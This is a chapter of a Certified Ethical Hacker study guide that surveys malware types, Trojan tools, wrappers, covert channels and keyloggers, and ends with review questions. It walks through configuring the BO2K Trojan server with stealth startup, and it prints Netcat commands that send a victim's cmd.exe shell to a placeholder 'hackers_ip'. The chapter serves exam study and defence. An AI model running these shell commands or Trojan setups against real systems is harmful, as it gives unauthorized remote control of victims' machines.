Chapter 8
Malware

CEH EXAM TOPICS COVERED IN THIS CHAPTER:

  • images   I. Background
    • images   E. Malware operations
  • images   XII. Tools/Systems/Programs
    • images   P. Antivirus systems and programs

  One of the prominent problems that has emerged with the spread of technology is malware. Malware is a term that covers viruses, worms, Trojans, and logic bombs as well as adware and spyware. These types of malware have caused a number of problems over the years, ranging from simple annoyances to dangerous and malicious exploits. Software that fits in the category of malware has evolved dramatically to now include the ability to steal passwords, personal information, and identities as well as damage hardware in some cases (as Stuxnet did).

Malware is a newer, blanket term, but the software types that it covers are far from new. Viruses and worms are some of the oldest forms of malicious software in existence. What has changed is the power of the technology, the creativity of the designers, and the effect of new distribution methods, such as more-complex networks, peer-to-peer file sharing, always-on Internet connections, and other mechanisms that have come to the forefront over the years.

This chapter also explores covert channels, the use of which has gradually increased. These channels are unknown, unmonitored components of a system that can be exploited to gain access to the system. Through the use of a covert channel, an attacker may be able to successfully gain access to a system without the owner’s knowledge or to delay detection so much that by the time the entry point is discovered, it is too late for the defender to do anything about it.

This chapter covers the following topics:

  • Trojans
  • Viruses
  • Worms
  • Using covert channels
  • Creating covert channels
  • Distributing malware
  • Working with logic bombs

Malware

Malware is a term that is frequently used but frequently misapplied, so let’s first clarify its meaning. The term malware is short for malicious software, which accurately explains what this class of software is designed to do: perform malicious and disruptive actions.

In past decades, what we now call malware was not so vicious in nature; it was more benign. Software in this class was able to infect, disrupt, disable, and in some cases corrupt other software, including the operating system. However, it generally just annoyed and irritated system owners; nastier forms were rare.

In recent years, though, this software category has come to include applications that are much more malignant. Current malware is designed to stay stealthy in many cases and employs a myriad of features designed to thwart detection by the increasingly complex and accurate antimalware systems, such as antivirus software and antispyware. What hasn’t changed is the fact that malware consumes resources and power on a host system or network, all the while keeping the owner in the dark as to its existence and activities.

Making the situation worse in today’s world is that current malware types have been influenced by the criminal element. The creation of botnets and theft of information are becoming all too common.

Another aspect of malware that has emerged is its use to steal information. Malware programs have been known to install what is known as a keylogger on a system. The intention is to capture keystrokes as they’re entered, with the intention of gathering information such as credit card numbers, bank account numbers, and similar information. For example, malware has been used to steal information from those engaging in online gaming, to obtain players’ game account information.

Malware and the Law

Ethical hackers should be mindful of the web of laws that relates to the deployment and use of malware. Over the years, malware has been subjected to increasing legal attention as the technology has evolved from being harmless to much more malicious and expansive in its abilities. The creation and use of malware have led to the enactment of some very strict laws; many countries have passed or modified laws to deter the use of malware. In the United States, the laws that have been enacted include the following:

The Computer Fraud and Abuse Act This law was originally passed to address federal computer-related offenses and the cracking of computer systems. The act applies to cases that involve federal interests, or situations involving federal government computers or those of financial institutions. In addition, the law covers computer crime that crosses state lines or jurisdictions.

The Patriot Act This act expanded on the powers already included in the Computer Fraud and Abuse Act. The law provides penalties of up to 10 years for a first offense and 20 years for a second offense. It assesses damages to multiple systems over the course of a year to determine if such damages are more than $5,000 total.

It is worth noting that The Patriot Act expired on June 1, 2015. However, on June 2, 2015, several provisions of the Patriot Act were restored in modified form as part of the USA Freedom Act.

CAN-SPAM Act This law was designed to thwart the spread of spam: mass-mailed messages that harass or irritate the recipient into purchasing products or services.

Categories of Malware

As stated earlier in this chapter, malware is an extremely broad term that blankets a range of software packages. We can say that malware is anything that steals resources, time, identity, or just about anything else while it is in operation. In order to understand what malware is, let’s look at the major types before we delve deeper into the mechanics of each:

  • Viruses are by far the best-known form of malicious software. This type of malware is designed to replicate and attach itself to other files resident on the system. Typically, viruses require some sort of user action to initiate their infectious activities.
  • Worms are a successor to viruses. The worm has been around in some shape or form since the late 1980s. The first worms were primitive by today’s standards, but they had a characteristic that is still seen today: the ability to replicate on their own very quickly. Worms that have emerged over the past decade or so have been responsible for some of the most devastating denial-of-service attacks known.
  • Trojan horses are a special type of malware that relies in large part on social-engineering techniques to start infecting a system and causing harm while appearing to look like a legitimate program. Similar to a virus in many respects, this malware relies on the user being somehow enticed into launching the infected program or wrapper, which in turn starts the Trojan.
  • Rootkits are a modern form of malware that can hide within the core components of a system and stay undetected by modern scanners. What makes rootkits most devastating is that they can be extremely difficult to detect and even more difficult to remove.
  • Spyware is malware designed to gather information about a system or a user’s activities in a stealthy manner. Spyware comes in many forms; among the most common are keyloggers.
  • Adware is malware that may replace home pages in browsers, place pop-up ads on a user’s desktop, or install items on a victim’s system that are designed to advertise products or services.

Each of these types of malware has its own traits, which you explore and learn to exploit in this chapter.

Viruses

A virus represents the oldest form of malware and is by far the best known to the public. But what is a virus? What separates a virus from other forms of malware? How is a virus created, and how does it target its victim? This section explores these questions and how they affect you, the ethical hacker.

The Life and Times of a Virus

Let’s explore what it means to be a virus before we get too far along. Simply put, a virus is a self-replicating application that attaches itself to other executable programs. Many viruses affect the host as soon as they are executed; others lie in wait, dormant, until a predetermined event or time, before carrying out their instructions. What does the virus do then? Many potential actions can take place, such as these:

  • Altering data
  • Infecting other programs
  • Replicating
  • Encrypting itself
  • Transforming itself into another form
  • Altering configuration settings
  • Destroying data
  • Corrupting or destroying hardware

The process of developing a virus is very methodical. The author is concerned with creating an effective virus that can be spread easily. The process occurs in six steps:

  1. Design—The author envisions and creates the virus. The author may choose to create the virus completely from scratch or use one of the many construction kits that are available to create the virus of their choice.
  2. Replication—Once deployed, the new virus spreads through replication: multiplying and then ultimately spreading to different systems. How this process takes place depends on the author’s original intent, but the process can be very rapid, with new systems becoming infected in short order.
  3. Launch—The virus starts to do its dirty work by carrying out the task for which it was created (such as destroying data or changing a system’s settings). Once the virus activates through a user action or other predetermined action, the infection begins.
  4. Detection—The virus is recognized as such after infecting systems for some period of time. During this phase, the nature of the infection is typically reported to antivirus makers, who begin their initial research into how the software works and how to eradicate it.
  5. Incorporation—The antivirus makers determine a way to identify the virus and incorporate the process into their products through updates. Typically, the newly identified malware is incorporated into signature files, which are downloaded and installed by the antivirus application.
  6. Elimination—Users of the antivirus products incorporate the updates into their systems and eliminate the virus.

It is important to realize that this process is not linear: It is a loop or cycle. When step 6 is reached, the whole process starts over at step 1 with another round of virus development.

All viruses are not created equal. Each may be created, deployed, and activated in different ways, with drastically different goals in mind, for example:

  • In the mid-1970s, a new feature was introduced in the Wabbit virus. This virus represented a change in tactics and demonstrated one of the features associated with modern-day viruses: replication. The virus replicated on the same computer over and over again until the system was overrun and eventually crashed.
  • In 1982, the first virus seen outside academia debuted in the form of the Elk Cloner virus. This piece of malware debuted another feature of later viruses—the ability to spread rapidly and remain in the computer’s memory to cause further infection. Once resident in memory, it infected floppy disks placed into the system, as many later viruses would do. Nowadays, this virus would be spread across USB devices such as flash drives.
  • Four short years later, the first PC-compatible virus debuted. The viruses prior to this point were Apple II types or designed for specific research networks. In 1986, the first boot-sector viruses debuted, demonstrating a technique later seen on a much wider scale. This type of virus infected the boot sector of a drive and spread its infection when the system was going through its boot process.
  • The first logic bomb debuted in 1987: the Jerusalem virus. This virus was designed to cause damage only on a certain date: Friday the 13th. The virus was so named because of its initial discovery in Jerusalem.
  • Multipartite viruses made their appearance in 1989 in the Ghostball virus. This virus was designed to cause damage using multiple methods and components, all of which had to be neutralized and removed to clear out the virus effectively.
  • Polymorphic viruses first appeared in 1992 as a way to evade early virus-detection techniques. Polymorphic viruses are designed to change their code and shape to avoid detection by virus scanners, which look for a specific virus code and not the new version. Polymorphic viruses employ a series of techniques to change or mutate, including the following:
    • Polymorphic engine—Alters or mutates the device’s design while keeping intact the payload (the part that does the damage).

    • Encryption—Used to scramble or hide the damaging payload, keeping antivirus engines from detecting it.

      When deployed, this type of virus mutates every time it is executed and may result in up to a 90 percent change in code, making it virtually unidentifiable to an antivirus engine.

  • Metamorphic viruses completely rewrite themselves on each infection. The complexity of these viruses is immense, with up to 90 percent of their code dedicated to the process of changing and rewriting the payload. In essence, this type of virus possesses the ability to reprogram itself. Through this process, such viruses can avoid detection by antivirus applications.
  • Mocmex—Fast-forward to 2008. Mocmex was shipped on digital photo frames manufactured in China. When the virus infected a system, the system’s firewall and antivirus software were disabled; then the virus attempted to steal online-game passwords.

Kinds of Viruses

Modern viruses come in many varieties:

A hoax is not a true virus in the sense of the others discussed here, but we need to cover this topic because a hoax can be just as powerful and devastating as a virus. Hoaxes are designed to make the user take action even though no infection or threat exists.

The following example is an email that actually is a hoax:

How to Create a Virus

Creating a virus is a process that can be very complicated or something that happens with a few button clicks (see Exercise 8.1). Advanced programmers may choose to code the malware from scratch. The less savvy or experienced may have to pursue other options, such as hiring someone to write the virus, purchasing code, or using an “underground” virus-maker application.

Another way to create a virus is to use a utility such as JPS Virus Maker. It is a simple utility in which you pick options from a GUI and then choose to create a new executable file that can be used to infect a host. Figure 8.1 shows the interface for JPS Virus Maker.

Screenshot of window for TeraBIT virus maker 2.8 SE has check boxes in on left for turn off monitor, mute system volume, et cetera. Create virus, save, load settings, exit buttons on right.

Figure 8.1 JPS Virus Maker user interface

Researching Viruses

There are many defensive techniques for fighting malware, many of which we will discuss later in this chapter, but what about researching new malware? If you need to investigate and analyze malware in addition to defending against it, you should know about a mechanism known as a sheep-dip system. A sheep-dip system is a computer that is specifically configured to analyze files. The system typically is stripped down and includes only those services and applications needed to test software to ascertain whether it is safe.

Worms

When we speak of viruses, the topic of worms is not far behind. They are another major menace. Unlike viruses, which by definition require some sort of action to occur in order to trigger their mischief, worms are entirely self-replicating. Worms effectively use the power of networks, malware, and speed to spread very dangerous and effective pieces of malware.

One example is the SQL Slammer worm from the early 2000s. At the time, the Slammer worm was responsible for widespread slowdowns and severe denials of services on the Internet. The worm took advantage of the fact that systems that had SQL Server or SQL Server’s Desktop products were vulnerable to a buffer overflow. Although Microsoft had released a patch six months prior to the worm’s debut, many organizations had neglected to install the patch. With this vulnerability still present on so many systems, the conditions for the attack were ripe. On the morning of January 25, 2003, the worm went active—and within 10 minutes, 75,000 machines were infected, along with many more over the next few hours.

The Functioning of Computer Worms

Worms are an advanced form of malware, compared to viruses, and have different goals in many cases. One of the main characteristics of worms is their inherent ability to replicate and spread across networks extremely quickly, as the previous Slammer example demonstrated. Most worms share certain features that help define how they work and what they can do:

  • Do not require a host application to perform their activities.
  • Do not necessarily require any user interaction, direct or otherwise, to function.
  • Replicate extremely rapidly across networks and hosts.
  • Consume bandwidth and resources.

Worms can also perform some other functions:

  • Transmit information from a victim system back to another location specified by the designer.
  • Carry a payload, such as a virus, and drop off this payload on multiple systems rapidly.

With these abilities in mind, it is important to distinguish worms from viruses by considering a couple of key points:

  • A worm can be considered a special type of malware that can replicate and consume memory, but at the same time it does not typically attach itself to other applications or software.
  • A worm spreads through infected networks automatically and requires only that a host is vulnerable. A virus does not have this ability.

Spyware

Spyware is a type of malware that is designed to collect and forward information regarding a victim’s activities to an interested party. The defining characteristic is that the application acts behind the scenes to gather this information without the user’s consent or knowledge.

The information gathered by spyware can be anything that the creator of the spyware feels is worthwhile. Spyware has been used to target ads, steal identities, generate revenue, alter systems, and capture other information. In addition, it is not unheard of for spyware to open the door for later attacks that may perform tasks such as downloading software and so on.

Methods of Spyware Infection

Spyware can be placed on a system in a number of different ways, each offering its own benefits. Once the software is installed, it stays hidden and carries out its goals. Methods of infection include, but are not limited to, the following:

Peer-to-Peer Networks (P2P) This delivery mechanism has become very popular because of the increased number of individuals using these networks to obtain free software.

Instant Messaging (IM) Delivering malicious software via IM is easy. Plus, IM software has never had much in the way of security controls.

Internet Relay Chat (IRC) IRC is a commonly used mechanism to deliver messages and software because of its widespread use and the ability to entice new users to download software.

Email Attachments With the rise of email as a communication medium, the practice of using it to distribute malware has also risen.

Physical Access Once an attacker gains physical access, it becomes relatively easy to install spyware and compromise the system.

Browser Defects Many users forget or do not choose to update their browsers as soon as updates are released, so distribution of spyware becomes easier.

Freeware Downloading software for free from unknown or untrusted sources can mean that you also download something nastier, such as spyware.

Websites Software is sometimes installed on a system via web browsing. When a user visits a given website, spyware may be downloaded and installed using scripting or some other means.

Spyware installed in this manner is quite common, because web browsers lend themselves to this process. They are frequently unpatched, do not have upgrades applied, or are incorrectly configured. In most cases, users do not use the most basic security precautions that come with a browser; and sometimes users override security options to get a better browsing experience or to see fewer pop-ups or prompts.

Software Installations One common way to install software such as spyware on a victim’s system is as part of another software installation. In these situations, a victim downloads a piece of software that they want, but packaged with it is a payload that is silently installed in the background. The victim may be told that something else is being installed on the system but may click through the installation wizard so quickly without reading anything that they miss the fact that additional software is being placed on their system.

Adware

Adware is a well-known type of malware. Many systems are actively infected with this type of malware from the various installations and other activities they perform. When this type of software is deployed onto a victim’s system, it displays ads, pop-ups, and nag screens and may even change the start page of the browser.

Typically, this type of software is spread either through a download with other software or when the victim visits a website that deploys it stealthily onto their system.

Scareware

A relatively new type of software is scareware. This type of malware warns the victim of potential harm that could befall them if they don’t take some action. Typically, this action involves providing a credit card number or doing something else to buy a utility they supposedly need to clean their system. In many cases, the utility the victim buys and installs is actually something else, such as spyware, adware, or even a virus.

This type of software relies on the ignorance or fear of potential victims who do not know that they are being played.

Ransomware

This new form of malware is one that is rapidly spreading and can cause lots of problems for those infected. Ransomware functions typically by searching for valuable files or data and encrypting them. Once they’re encrypted, the victim will be informed that they need to pay an amount to get the code to unlock their files. Another form of this type of malware is not to encrypt files but to display pornographic images on their system and stop only if a certain amount is paid in ransom.

Trojans

One of the older and potentially widely misunderstood forms of malware is the Trojan. Simply put, a Trojan is a software application that is designed to provide covert access to a victim’s system. The malicious code is packaged in such a way that it appears harmless and thus gets around both the scrutiny of the user and the antivirus or other applications that are looking for malware. Once on a system, its goals are similar to those of a virus or worm: to get and maintain control of the system or perform some other task.

A Trojan infection may be indicated by some of the following behaviors:

  • The CD drawer of a computer opens and closes.
  • The computer screen changes, either flipping or inverting.
  • Screen settings change by themselves.
  • Documents print with no explanation.
  • The browser is redirected to a strange or unknown web page.
  • The Windows color settings change.
  • Screen saver settings change.
  • The right and left mouse buttons reverse their functions.
  • The mouse pointer disappears.
  • The mouse pointer moves in unexplained ways.
  • The Start button disappears.
  • Chat boxes appear.
  • The Internet service provider (ISP) reports that the victim’s computer is running port scans.
  • People chatting with you appear to know detailed personal information about you.
  • The system shuts down by itself.
  • The taskbar disappears.
  • Account passwords are changed.
  • Legitimate accounts are accessed without authorization.
  • Unknown purchase statements appear on credit card bills.
  • Modems dial and connect to the Internet by themselves.
  • Ctrl+Alt+Del stops working.
  • When the computer is rebooted, a message states that other users are still connected.

Operations that could be performed by a hacker on a target computer system include these:

  • Stealing data
  • Installing software
  • Downloading or uploading files
  • Modifying files
  • Installing keyloggers
  • Viewing the system user’s screen
  • Consuming computer storage space
  • Crashing the victim’s system

Before we get too far on the subject of Trojans, you need to know about covert and overt channels. A Trojan relies on these items:

  • An overt channel is a communication path or channel that is used to send information or perform other actions. HTTP and TCP/IP are examples of communication mechanisms that can and do send information legitimately.
  • A covert channel is a path that is used to transmit or convey information but does so in a way that is illegitimate or supposed to be impossible but is able to circumvent security. The covert channel violates security policy on a system.

Why would an attacker wish to use a Trojan instead of a virus? The reason typically is because a Trojan is more stealthy, coupled with the fact that it opens a covert channel that can be used to transmit information. The data transmitted can be a number of items, including identity information.

Types of Trojans include the following:

Remote Access Trojans (RATs) Designed to give an attacker remote control over a victim’s system. Two well-known members of this class are the SubSeven program and its cousin, Back Orifice, although both are older examples.

Data Sending To fit into this category, a Trojan must capture some sort of data from the victim’s system, including files and keystrokes. Once captured, this data can be transmitted via email or other means if the Trojan is so enabled. Keyloggers are common Trojans of this type.

Destructive This type of Trojan seeks to corrupt, erase, or destroy data outright on a system. In more extreme cases, the Trojan may affect the hardware in such a way that it becomes unusable.

Proxy Malware of this type causes a system to be used as a proxy by the attacker. The attacker uses the victim’s system to scan or access another system or location. The result is that the actual attacker is hard to find.

FTP Software in this category is designed to set up the infected system as an FTP server. An infected system becomes a server hosting all sorts of information, which may include illegal content of all types.

Security Software Disablers A Trojan can be used as the first step in further attacks if it is used to disable security software.

Detecting Trojans and Viruses

A Trojan can be detected in many ways. Port scanning can prove very effective if you know what to look for.

Because a Trojan is used to allow access through backdoors or covert channels, a port must be opened to allow this communication. A port scan using a tool such as Nmap reveals these ports and allows you to investigate them further.

The following ports are used for classic Trojans:

  • Back Orifice—UDP 31337 or 31338
  • Back Orifice 2000—TCP/UDP 54320/54321
  • Beast—TCP 6666
  • Citrix ICA—TCP/UDP 1494
  • Deep Throat—UDP 2140 and 3150
  • Desktop Control—UDP NA
  • Loki—Internet Control Message Protocol (ICMP)
  • NetBus—TCP 12345 and 12346
  • Netcat—TCP/UDP (any)
  • NetMeeting Remote—TCP 49608/49609
  • pcAnywhere—TCP 5631/5632/65301
  • Reachout—TCP 43188
  • Remotely Anywhere—TCP 2000/2001
  • Remote—TCP/UDP 135-1139
  • Whack-a-Mole—TCP 12361 and 12362
  • NetBus 2 Pro—TCP 20034
  • GirlFriend—TCP 21544
  • Masters Paradise—TCP 3129, 40421, 40422, 40423, and 40426
  • Timbuktu—TCP/UDP 407
  • VNC—TCP/UDP 5800/5801

See Exercise 8.2 to learn how to use netstat to detect open ports.

Note that although the ports here refer to some classic examples of Trojans, there are many new ones. We cannot list them all, because they are ever evolving and the ports change.

See Exercise 8.3 to learn about TCPView.

Tools for Creating Trojans

A wide range of tools exists that are used to take control of a victim’s system and leave behind a gift in the form of a backdoor. This is not an exhaustive list, and newer versions of many of these are released regularly:

Let Me Rule A remote access Trojan authored entirely in Delphi. It uses TCP port 26097 by default.

RECUB Remote Encrypted Callback Unix Backdoor (RECUB) borrows its name from the Unix world. It features RC4 encryption, code injection, and encrypted ICMP communication requests. It demonstrates a key trait of Trojan software—small size—as it tips the scale at less than 6 KB.

Phatbot Capable of stealing personal information including email addresses, credit card numbers, and software licensing codes. It returns this information to the attacker or requestor using a P2P network. Phatbot can also terminate many antivirus and software-based firewall products, leaving the victim open to secondary attacks.

Amitis Opens TCP port 27551 to give the hacker complete control over the victim’s computer.

Zombam.B Allows the attacker to use a web browser to infect a computer. It uses port 80 by default and is created with a Trojan-generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes.

Beast Uses a technique known as Data Definition Language (DDL) injection to inject itself into an existing process, effectively hiding itself from process viewers.

Hard-Disk Killer A Trojan written to destroy a system’s hard drive. When executed, it attacks a system’s hard drive and wipes it in just a few seconds.

One tool that should be mentioned as well is Back Orifice, which is an older Trojan-creation tool. Most, if not all, of the antivirus applications in use today should be able to detect and remove this software.

I thought it would be interesting to look at the text the manufacturer uses to describe its toolkit. Note that it sounds very much like the way a normal software application from a major vendor would be described. The manufacturer of Back Orifice says this about Back Orifice 2000 (BO2K):

Built upon the phenomenal success of Back Orifice released in August 98, BO2K puts network administrators solidly back in control. In control of the system, network, registry, passwords, file system, and processes. BO2K is a lot like other major file-synchronization and remote control packages that are on the market as commercial products. Except that BO2K is smaller, faster, free, and very, very extensible. With the help of the open-source development community, BO2K will grow even more powerful. With new plug-ins and features being added all the time, BO2K is an obvious choice for the productive network administrator.

An In-Depth Look at BO2K

Whether you consider it a Trojan or a remote administrator tool, the capabilities of BO2K are fairly extensive for something of this type. This list of features is adapted from the manufacturer’s website:

  • Address book–style server list
  • Functionality that can be extended via the use of plug-ins
  • Multiple simultaneous server connections
  • Session-logging capability
  • Native server support
  • Keylogging capability
  • Hypertext Transfer Protocol (HTTP) file system browsing and transfer
  • Microsoft Networking file sharing
  • Remote registry editing
  • File browsing, transfer, and management
  • Plug-in extensibility
  • Remote upgrading, installation, and uninstallation
  • Network redirection of Transfer Control Protocol/Internet Protocol (TCP/IP) connections
  • Ability to access console programs such as command shells through Telnet
  • Multimedia support for audio/video capture and audio playback
  • Windows NT registry passwords and Win9x screen saver password dumping
  • Process control, start, stop, and list
  • Multiple client connections over any medium
  • GUI message prompts

BO2K is a next-generation tool that was designed to accept customized, specially designed plug-ins. It is a dangerous tool in the wrong hands. With the software’s ability to be configured to carry out a diverse set of tasks at the attacker’s behest, it can be a devastating tool.

BO2K consists of two software components: a client and a server. To use the BO2K server, the configuration is as follows:

  1. Start the BO2K Wizard, and click Next when the wizard’s splash screen appears.
  2. When prompted by the wizard, enter the server executable to be edited.
  3. Choose the protocol over which to run the server communication. The typical choice is to use TCP as the protocol, due to its inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed.
  4. The next screen asks what port number will be used. Port 80 is generally open, and so it’s most often used, but you can use any open port.
  5. In the next screen, enter a password that will be used to access the server. Note that passwords can be used, but you can also choose open authentication—that means anyone can gain access without having to supply credentials of any kind.
  6. When the wizard finishes, the server-configuration tool is provided with the information you entered.
  7. The server can be configured to start when the system starts up. This allows the program to restart every time the system is rebooted, preventing the program from becoming unavailable.
  8. Click Save Server to save the changes and commit them to the server.

Once the server is configured, it is ready to be installed on the victim’s system.

No matter how the installation is to take place, the only application that needs to be run on the target system is the BO2K executable. After this application has run, the previously configured port is open on the victim’s system and ready to accept input from the attacker.

The application also runs an executable file called Umgr32.exe and places it in the Windows system32 folder. In addition, if you configure the BO2K executable to run in stealth mode, it does not show up in Task Manager—it modifies an existing running process to act as its cover. If stealth was not configured, the application appears as a Remote Administration Service.

The attacker now has a foothold on the victim’s system.

Distributing Trojans

Once a Trojan has been created, you must address how to get it onto a victim’s system. For this step, many options are available, including tools known as wrappers.

Using Wrappers to Install Trojans

Using wrappers, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. Some more advanced wrapper-style programs can even bind together several applications rather than just two. At this point, the new executable can be posted in a location where it is likely to be downloaded.

Consider a situation in which a would-be attacker downloads an authentic application from a vendor’s website and uses wrappers to merge a Trojan (BO2K) into the application before posting it on a newsgroup or other location. What looks harmless to the downloader is actually a bomb waiting to go off on the system. When the victim runs the infected software, the infector installs and takes over the system.

Some of the better-known wrapper programs are the following:

  • EliteWrap is one of the most popular wrapping tools, due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. The software can be configured to the point of letting the attacker choose an installation directory for the payload. Software wrapped with EliteWrap can be configured to install silently without any user interaction.
  • Saran Wrap is specifically designed to work with and hide Back Orifice. It can bundle Back Orifice with an existing program into what appears to be a standard program using Install Shield.
  • Trojan Man merges programs and can encrypt the new package in order to bypass antivirus programs.
  • Teflon Oil Patch is designed to bind Trojans to a specified file in order to defeat Trojan-detection applications.
  • Restorator was designed with the best of intentions but is now used for less-than-honorable purposes. It can add a payload to, for example, a seemingly harmless screen saver, before it is forwarded to the victim.
  • Firekiller 2000 is designed to be used with other applications when wrapped. This application disables firewall and antivirus software. Programs such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior to being patched.
Trojan Construction Kits

Much as for viruses and worms, several construction kits are available that allow for the rapid creation and deployment of Trojans. The availability of these kits has made designing and deploying malware easier than ever before:

Trojan Construction Kit One of the best examples of a relatively easy-to-use but potentially destructive tool. This kit is command-line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little effort, it is possible to build a Trojan that can engage in destructive behavior such as destroying partition tables, master boot records (MBRs), and hard drives.

Senna Spy Another Trojan-creation kit that provides custom options, such as file transfer, executing DOS commands, keyboard control, and list and control processes.

Stealth Tool A program used not to create Trojans but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.

Backdoors

Many attackers gain access to their target system through a backdoor. The owner of a system compromised in this way may have no indication that someone else is using the system.

When implemented, a backdoor typically achieves one or more of the following key goals:

  • Lets an attacker access a system later by bypassing any countermeasures the system owner may have placed.
  • Provides the ability to gain access to a system while keeping a low profile. This allows an attacker to access a system and circumvent logging and other detective methods.
  • Provides the ability to access a system with minimal effort in the least amount of time. Under the right conditions, a backdoor lets an attacker gain access to a system without having to rehack.

Some common backdoors that are placed on a system are of the following types and purposes:

  • Password-cracking backdoor—Backdoors of this type rely on an attacker uncovering and exploiting weak passwords that have been configured by the system owner.
  • Process-hiding backdoor—An attacker who wants to stay undetected for as long as possible typically chooses to go the extra step of hiding the software they are running. Programs such as a compromised service, a password cracker, sniffers, and rootkits are items that an attacker will configure so as to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program and altering other files on a system to prevent them from being detected and running.

Once a backdoor is in place, an attacker can access and manipulate the system at will.

Overt and Covert Channels

When you are working with Trojans and other malware, you need to be aware of covert and overt channels. As mentioned earlier in the chapter, the difference between the two is that an overt channel is put in place by design and represents the legitimate or intended way for the system or process to be used, whereas a covert channel uses a system or process in a way that it was not intended to be used.

The biggest users of covert channels that we have discussed are Trojans. Trojans are designed to stay hidden while they send information or receive instructions from another source. Using covert channels means the information and communication may be able to slip past detective mechanisms that are not designed or positioned to be aware of or look for such behavior.

Tools to exploit covert channels include the following:

Loki Originally designed to be a proof of concept on how ICMP traffic can be used as a covert channel. This tool is used to pass information inside ICMP echo packets, which can carry a data payload but typically do not. Because the ability to carry data exists but is not used, this can make an ideal covert channel.

ICMP Backdoor Similar to Loki, but instead of using Ping echo packets, it uses Ping replies.

007Shell Uses ICMP packets to send information, but goes the extra step of formatting the packets so they are a normal size.

B0CK Similar to Loki but uses Internet Group Management Protocol (IGMP).

Reverse World Wide Web (WWW) Tunneling Shell Creates covert channels through firewalls and proxies by masquerading as normal web traffic.

AckCmd Provides a command shell on Windows systems.

Another powerful way of extracting information from a victim’s system is to use a piece of technology known as a keylogger. Software in this category is designed to capture and report activity in the form of keyboard usage on a target system. When placed on a system, it gives the attacker the ability to monitor all activity on a system and reports back to the attacker. Under the right conditions, this software can capture passwords, confidential information, and other data.

Some of the keystroke recorders are these:

IKS Software Keylogger A Windows-based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it does not show up in process lists or through normal detection methods.

Ghost Keylogger Another Windows-based keylogger that is designed to run silently in the background on a system, much like IKS. The difference between this software and IKS is that it can record activity to an encrypted log that can be emailed to the attacker.

Spector Pro Designed to capture keystroke activity, email passwords, chat conversations and logs, and instant messages.

Fakegina An advanced keylogger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system. Specifically, it intercepts the communication between the Winlogon process and the logon GUI in Windows.

Netcat is a simple command-line utility available for Linux, Unix, and Windows platforms. It is designed to read information from connections using TCP or UDP and do simple port redirection on them as configured.

Let’s look at the steps involved to use Netcat to perform port redirection. The first step is for the hacker to set up what is known as a listener on their system. This prepares the attacker’s system to receive the information from the victim’s system. To set up a listener, the command is as follows:

nc -v -l -p 80

In this example, nc is run with the -v switch for verbose mode, which provides additional information; -l means to listen and -p tells the program to listen on a specific port.

After this, the attacker needs to execute the following command on the victim’s system to redirect the traffic to their system:

nc hackers_ip 80 -e "cmd.exe"

In this second command the desired IP is entered and then followed by a port number; the -e states that the executable following the switch is to be run on connect.

Once this is entered, the net effect is that the command shell on the victim’s system is at the attacker’s command prompt, ready for input as desired.

Of course, Netcat has some other capabilities, including port scanning and placing files on a victim’s system. Port scanning can be accomplished using the following command:

nc -v -z -w1 IPaddress <start port> - <ending port>

This command scans a range of ports as specified.

Netcat isn’t the only tool available to do port redirection. Tools such as Datapipe and Fpipe can perform the same functions, albeit in different ways.

The following is a list of options available for Netcat:

Nc –d Detaches Netcat from the console

Nc -l -p [port] Creates a simple listening TCP port; adding -u places it into UDP mode.

Nc -e [program] Redirects stdin/stdout from a program

Nc -w [timeout] Sets a timeout before Netcat automatically quits

Program | nc Pipes program output to Netcat

Nc | program Pipes Netcat output to a program

Nc -h Displays help options

Nc -v Puts Netcat into verbose mode

Nc -g or nc -G Specifies source routing flags

Nc -t Used for Telnet negotiation

Nc -o [file] Hex-dumps traffic to a file.

Nc -z Used for port scanning without transmitting data

Summary

In this chapter, we covered one of the largest and most dangerous threats that has emerged and evolved over the last 30 years: malware. You learned that malware is a blanket term used to describe the family of software that includes viruses, worms, Trojans, and logic bombs, as well as adware and spyware. Each of these types of malware has been responsible for problems over the years and has done everything from being an annoyance to causing outright harm. Malware collectively has evolved dramatically to now include the ability to steal passwords, personal information, and identities in addition to being used in countless other crimes.

You learned that malware is just an encompassing term but the software types that it covers are far from new. Viruses and worms are some of the oldest malicious software in existence. But the power of this software has changed dramatically as hardware and software have become more powerful, and the bar to create malware has been lowered (thanks to readily available tools). Exacerbating the problem is the fact that malware can be distributed quickly, thanks to improved connectivity and faster distribution methods that are readily available and accessible.

Exam Essentials

Understand the different types of malware. You must know the difference between viruses, worms, and Trojans. Each has a unique way of functioning, and you must understand these innate differences.

Know how to identify malware. Be aware of the signs of a malware attack.

Understand the flexible terminology. The topic of malware is presented on the exam in many varied ways. Malware takes many forms, each of which has it own functions and features.

Review Questions

  1. Which statement(s) defines malware most accurately?

    1. Malware is a form of virus.
    2. Trojans are malware.
    3. Malware covers all malicious software.
    4. Malware only covers spyware.

  2. Which is/are a characteristic of a virus?

    1. A virus is malware.
    2. A virus replicates on its own.
    3. A virus replicates with user interaction.
    4. A virus is an item that runs silently.

  3. A virus does not do which of the following?

    1. Replicate with user interaction
    2. Change configuration settings
    3. Exploit vulnerabilities
    4. Display pop-ups

  4. Which of the following is/are true of a worm?

    1. A worm is malware.
    2. A worm replicates on its own.
    3. A worm replicates with user interaction.
    4. A worm is an item that runs silently.

  5. What are worms typically known for?

    1. Rapid replication
    2. Configuration changes
    3. Identity theft
    4. DDoS

  6. What command is used to listen to open ports with netstat?

    1. netstat -an
    2. netstat -ports
    3. netstat -n
    4. netstat -s

  7. Which utility will tell you in real time which ports are listening or in another state?

    1. Netstat
    2. TCPView
    3. Nmap
    4. Loki

  8. Which of the following is not a Trojan?

    1. BO2K
    2. LOKI
    3. Subseven
    4. TCPTROJAN

  9. What is not a benefit of hardware keyloggers?

    1. Easy to hide
    2. Difficult to install
    3. Difficult to detect
    4. Difficult to log

  10. Which of the following is capable of port redirection?

    1. Netstat
    2. TCPView
    3. Netcat
    4. Loki

  11. A Trojan relies on __________ to be activated.

    1. Vulnerabilities
    2. Trickery and deception
    3. Social engineering
